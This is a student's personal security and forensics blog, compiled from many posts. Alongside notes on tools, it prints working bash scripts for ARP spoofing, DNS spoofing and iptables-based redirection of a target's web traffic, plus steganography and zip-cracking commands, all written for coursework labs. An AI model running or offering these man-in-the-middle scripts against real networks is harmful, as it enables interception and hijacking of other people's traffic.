New Language: Python

Last week I decided to delve into the world of Python.

After my Placement Year, i will be starting my Final Year Project. 

My project will be software based and i want to use Python for it. So i thought id start learning now!

I couldnt help myself so i started on the FYP as i was learning. I think it was actually much easier learning the language with an actual objective rather than going through tutorials to learn little bits at a time. 

Not sure how much I want to put on here about the FYP i have in mind at the moment as id rather not have it copied!

I Have Started My New Job!

I am now a Junior Cyber Security Engineer for a well respected firm in the West Midlands.

My first day was yesterday which involved the usual; setting up email, setting up the new laptop, getting to know the clients that are on the books etc etc.

Tomorrow I am off to Manchester to attend a Cisco Security Workshop!

I will be using this blog to keep track of all the things i will be doing over the next year because at the end of it, i have to write an essay about it so it will be useful for remembering things!

PS. I hate setting up new computers to get them to exactly how you want them!

Placement Year

Pretext: I have mentioned about doing another couple of posts about the work ive been doing over the past month, but I havent gotten around to it with deadlines and stuff. Ill sort them out soon...


I seem to have forgotten to post about my Placement Year.
At my university, i do 2 years, then a "Year in Industry" and then go back for my final year.

I thought I had sorted this before Christmas, but one thing led to another and it didnt pan out!
I kind of pre-empted the first placement falling through, so i started looking for another.

I found one!

Effects of Encryption on IT Systems and Digital Investigations

I feel that alot of my posts on this blog have been Cyber Security related when theoretically, given the name of my course "Forensic Computing" it should be based around Forensics!
So its my "Easter Resolution" to do more forensics posts. Starting with this one.

The title of this post was the title of the essay i had to write. As i said in the other post, i enjoyed doing this essay. It forced me to really look at encryption and learn the ins and outs. Before doing it, i had a general idea of Symmetric and Asymmetric encryption but not the technical details of it.

The breakdown of my essay was something like this:

Ahh The Easter Break...My Work Overview

After completing all the exciting work before Easter, because, well, it was more exciting that the standard essays. I am now left with completing pure essays and not much hands on Hacking/Forensics!

Currently left to hand in i have:

• Essay on "The effects of Encryption on IT Systems and Digital Investigations"
• Essay on "Biometric Spoofing Techniques"
• A Penetration Testing Methodology
• A Penetration Testing Report
• Writing up notes from a Digital Investigation on a suspects USB stick and network traces.

Nexpose - New Favourite Toy

I did an essay last semester giving a brief comparison of various vulnerability scanners. I have to admit, I didnt install and try as many as i could, mainly because the essay didnt call for it, but i should have.
If I did, i would have found Nexpose sooner!!!

In our Ethical Hacking module, we have to scan and exploit a target. In reality, this is a VM with Metasploitable installed on it.

However, because we were attacking it from any given location, the IP address associated to each VM had to be accesible outside our closed Forensic Lab network.
This means Nessus was a no go due to licencing restrictions and coupled with the fact that OpenVas is such a ball ache - i thought id give Nexpose a go.

Using DD Command

So I thought i really should backup my hard drive on my laptop.
I was in a situation today where a 32GB Memory Stick just wasnt big enough (EnCase!!!).

So i brought a 1TB 2.5" drive today and thought it would be a good opportunity to properly use the DD command to take an image of it.

Here is the syntax i used:

dd if=/dev/sda of=/media/DRIVE-LABEL/backup.dd bs=512k

It took the best part of 3 hours to do 250GB over USB.

Why Didn't I Use "Alias" Alot More Before!?!

I have had a couple of aliases set up for months and months.
Use them all the time, but completely forgot about the actual Alias function and how much time it can save me.

I have gone from having 2/3 to having about 10!

Everything from killing specific processes such as "arpspoof" to quickly "cd" to a favourite folder (my new bashscripts).
I have got a couple for quickly displaying the IPTables and clearing them!

Im going to put a list below this fold mainly for me to remember them if i ever need them again on someone elses laptop.

Oh The Joys Of OpenVas...

Seeing as OpenVas is meant to be built into Kali. Jesus Christ its a pain in the arse to set up!!!!!!!

Ive spent hours upon hours over the past few weeks trying to get it going.
Do you think i got it working? Did i ******!!!!

So many errors, not enough storage space on the internet to store all the screenshots of errors ive had recently.

I really wanted it to work because i enjoy using Kali so much. But it just wasnt going to happen.
So i had a look on the OpenVas website and saw that it was a very simple install to get it going on Fedora and some other distros.
So i downloaded Fedora, booted it into a virtual machine. Updated Fedora (3 hours!!!) and then done the command to install OpenVas.

Why did i not do this in the first place!!!!

The install was painless, the setting up took ages as it was downloading the whole internet i think. Took about 1 hour.

But it works!

SslStrip Bash Script

I had some headaches making this. Figured out i was doing things in the wrong order!!!!!

Right, so, its not perfect. Its in multiple scripts for the moment whilst i try to figure out a way to get them all running from one script and not having to re-type in Port numbers and IP's!

Another DNS Bash Script

Im having fun with these bash scripts.

This one is one of my favourites i think, well it will be when it get it working 100%. Few niggly problems at the moment.

So basically, in the previous one, it redirects the browser to my locally hosted Apache server which can have anything on it.
However, i wanted to have a little bit more fun than that. I wanted the Target to be Re-Directed to a different website.
So if they tried to access "www.bbc.co.uk" they would be redirected to "www.dailymail.co.uk".

I have also added in a line at the end to automatically call the ArpSpoof script.
One major flaw is i cant seem to get it so it actually loads the website properly. There seems to be a lack of CSS on the page it gets re-directed too. I will look into this further......

#!/bin/bash

echo '1' > /proc/sys/net/ipv4/ip_forward

/etc/init.d/apache2 start

iptables -t nat --flush

iptables --zero

echo -e "Enter your interface: wlan0 or eth0"

read NIC

echo -e "Enter Either Your IP - OR IP Of Site To ReDirect Too: EG 192.168.0.4 - OR - 212.58.246.103:80 \n \t\t IF YOU ARE DOING IT TO EXTERNAL IP THEN ADD THE PORT!!!!"

read INTIP

iptables -A FORWARD --in-interface "$NIC" -j ACCEPT

iptables -t nat --append POSTROUTING --out-interface "$NIC" -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination "$INTIP"

sh ./ARPSPOOFBASH

Modified DNSSpoof Bash Script

This is slightly modified version of my previous post.
It only spoofs the DNS for a specific URL.
This is better for a MITM attack.

(I should really test this first actually. Oh well....)

#!/bin/bash

echo '1' > /proc/sys/net/ipv4/ip_forward

/etc/init.d/apache2 start

echo -e "REMEMBER TO PERFORM AN ARPSPOOF FIRST OTHERWISE THIS WILL NOT WORK!!!!!!"

echo -e "Please enter your IP and the site you wish to target: EG: 192.168.0.2 www.bbc.co.uk"

read INPUTDNS

echo "$INPUTDNS" > dnsspooftxt.txt

echo -e "Test file:\n\n"

cat dnsspooftxt.txt

echo -e "\n\n Are you using wlan0 or eth0?"

read NIC

echo -e "You Chose:\n"

echo -e "$NIC"

echo -e "Starting DNS Spoof...."

gnome-terminal -x dnsspoof -i "$NIC" -f dnsspooftxt.txt

DNSSpoof Bash Script

This ties into my previous post.
This script does some IPTables commands then calls the previous script to execute the arpspoof.

#!/bin/bash

/etc/init.d/apache2 start

iptables -t nat --flush

iptables --zero

echo -e "Enter your interface: wlan0 or eth0"

read NIC

echo -e "Enter your IP: EG 192.168.0.4"

read INTIP

iptables -A FORWARD --in-interface "$NIC" -j ACCEPT

iptables -t nat --append POSTROUTING --out-interface "$NIC" -j MASQUERADE

iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination "$INTIP"

sh ./ARPSPOOFBASH

Enjoy!!

ArpSpoof Bash Script - First Script!

This is my first attempt at a Bash script and i did pretty well i think.
Its nothing special but it works and saves me about 30 seconds of time!!
I couldnt be bothered to keep typing in commands, and to be honest, i kept forgetting them!!

#!/bin/bash

echo '1' > /proc/sys/net/ipv4/ip_forward

#Ask for 2 IPS

echo -e "Please Enter The HOST IP"

read HOSTIP

echo -e "Please Enter The TARGET IP"

read TARGETIP

echo "You entered: \"$HOSTIP\" \"$TARGETIP\""

echo -e "Are you using wlan0 or eth0?"

read NIC

echo "Preparing........."

echo -e "\t\t Target: $TARGETIP \n"

echo -e "\t\t Host: $HOSTIP \n\n"

echo -e "Starting ArpSpoof"

gnome-terminal -x arpspoof -i "$NIC" -t "$TARGETIP" -r "$HOSTIP" 

gnome-terminal --tab -x arpspoof -i "$NIC" -t "$HOSTIP" "$TARGETIP" 

Feel free to use it!

Trying A New Terminal - Terminator

So i saw this a while back, and completely forgot about it.

I came across it today whilst i was researching something else and thought id give it a go!

Install was easy enough now that it has been added to the Kali native repos.

apt-get install terminator

Installs automatically and its good to go.
Its located under Accessories.

I ran into an issue. I use the "Open In Terminal" function ALOT!
But after installing Terminator this was broken. Nothing happened. Not even CTRL-ALT-T.

So, after a bit of researching I came up with a solution.

update-alternatives --config x-terminal-emulator

This fixed it!

Extract Zip File From Wireshark

So, I needed to extract a file from a network log file in Wireshark.
Never done it before. Only ever used the "Export Items" function in Wireshark for HTTP items.

I was playing around on Wireshark and actually came up with an answer without Googling!!! Yay me....:)

The item in question was transferred through FTP.
So i filtered for "ftp-data".
I found the right TCP Stream, in this case 307 and right-clicked, follow TCP Stream.

The box came up. If you press Save As and then name the file "anything.zip", Wireshark will export that TCP stream as a zip file!

Image below:

StegDetect + StegBreak Update

So after all the hassle i had getting this thing set up on Kali, leading the inevitable giving up and moving to something else, i thought i should do a post reminding me of the commands i used in the end on Deft.

So, the wordlist i originally used kept giving me errors every now and then. So i found another word list and used that instead.
Found from here: https://wiki.skullsecurity.org/Passwords

Note to self, Get a bigger hard drive to download them all on! They are big! :)

Steg Detect

Command:

stegdetect -t p *.jpg

This is used if the method to Steg the file is "jphide".

Steg Break

Command:

stegbreak -f <word list> -t p *.jpg

Again, used if the method to Steg the file is "jphide".

Change Root Password Linux

I installed Deft earlier today, and when i first came to login, i did not want to login as the user i created during setup, i wanted to be Root.
So i selected "Other" from the menu, typed in "root" and typed in the root password for Deft which is "deft".

Error, Password Not Correct.

Oh...

DEFT Forensics Live Disc

Now I'm a big lover of Kali, especially with the course I am on as it's a good mix between forensics and security.
But a situation came up yesterday where kali just wasn't cutting it. I did a post about it yesterday.

After playing with the live image, I thought I should install it on a virtual machine and try and use it properly to get a bit of experience with it.

It was extremely quick to install, even when i enabled the option to download updates during installation!

I am going to properly try it out over the next couple of weeks doing my assignment, but first impressions are good!


Deft: http://www.deftlinux.net/

Zip Password Cracker Kali

So i have just extracted a zip file from a Wireshark log file.

I tried to unzip it and it seems to have a password.

I have never used a password cracker in Linux before so i had a quick Google to see what Kali comes bundled with to do this. I came up with "fcrackzip".

This post is mainly to keep the commands written down somewhere for my own personal use, but might help someone if they are awful at Googling and cant find what they need in the hundreds of pages talking about fcrackzip.

Stegbreak Segmentation Fault Fix

Well, not exactly a fix, but a small workaround within reason.

I had a lot of trouble getting this to work until i stumbled upon a post explaining why its not working.
It was on Debians bug tracker: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345230

If you have this issue, its because your word list has words over 127 characters.

The only option is to run a script to extract words under 127 characters and put them into a separate file.

Here is the script:

perl -pe 'BEGIN { @bad = (128..255); map { $_ = chr $_ } @bad; };
undef $_ if /[@bad]/' /usr/share/dict/words > stegbreak.wordlist

Enjoy!

How To Install Stegdetect In Kali

Don't bother. Give up. Its way too much hassle.

Apart from being extremely hard to find, you have to mess around with moving files here there and everywhere. No one has time for that.

I have spent the majority of the day, from about 11am till about 7pm trying to get it to work.

I am not one to give up, I very rarely give up, but in this case, it was the most sensible option because i was literally pulling my hair out and getting frustrated.

DNS Spoofing

In addition to the Arpspoof blog i posted earlier here is a post about DNS Spoofing which ties in with it.
NB. This does NOT work for HTTPS (I will cover this in a separate blog at some point)

All these commands need to be done before the Arpspoof commands are done.

• /etc/init.d/apache2 start
• iptables -t nat --flush
• iptables --zero
• iptables -A FORWARD --in-interface wlan0 -j ACCEPT
• iptables -t nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE 
• iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination <yourIP>

 This will start the Apache server so you can host the webpage the target will be diverted too.
Location: /root/var/www/index.html

It will then set up all the IPTABLES rules.
Where it says <yourIP> I mean your internal IP.

When you have completed these commands, run the Arpspoof commands in the other post and test it out!!!

Assignments Overview

I mentioned in my first post i have 7 assignments to complete.
These consist of the following:

2 Digital Investigation styled assignments
1 Assignment based on Encryption
1 Assignment based on Biometrics
1 Presentation based on Biometrics
2 Assignments based on Cyber Security


I have already started on most of these and i dont fancy going back and writing posts about what ive learned with them so far so when i do a post about them, i will give a quick recap!

Arpspoof Issues and Success

Over the past week, we have been learning about Arp Spoofing and DNS Spoofing.

I didn't fancy doing it the way everyone else was doing it, with PackETH. I wanted to do it the more manual way. I prefer learning to do it the manual way as I think you learn alot more in the process, even if it is Extremely frustrating.

Whilst I started on this last week, I am only writing the blog now (as I only made it 10 mins ago!!), so I cant remember the extent of all the issues i ran into.

What i finally realised was that i was doign the commands wrong. All the tutorials on the internet were obviously using an older version of Arpspoof as when i finally figured it out, the syntax was different.

Welcome!

I am a Digital Forensics student studying at university in the UK. I also do some Cyber Security modules.
I am currently in my 2nd year.

I have mainly started this to post interesting things I have learned and problems I have encountered.
However, I will use it to do write ups about useful things I want to remember such as commands and tools I have used so I don't forget them! (To be honest, I don't expect anyone to read this!)

I should have started this earlier. I had a plan, before I started Uni to start this from day one. Obviously that did not happen.

So here we are, half way through year 2! Currently, I have around 7 assignments still to complete by April!

As a side note, 99% of my posts are going to be related to tools used within Kali, but some posts will be regarding Windows tools I have to use such as EnCase.
I moved from just using Windows to Linux in Summer 2014, mainly to force myself to learn Linux as I have been putting it off for so long.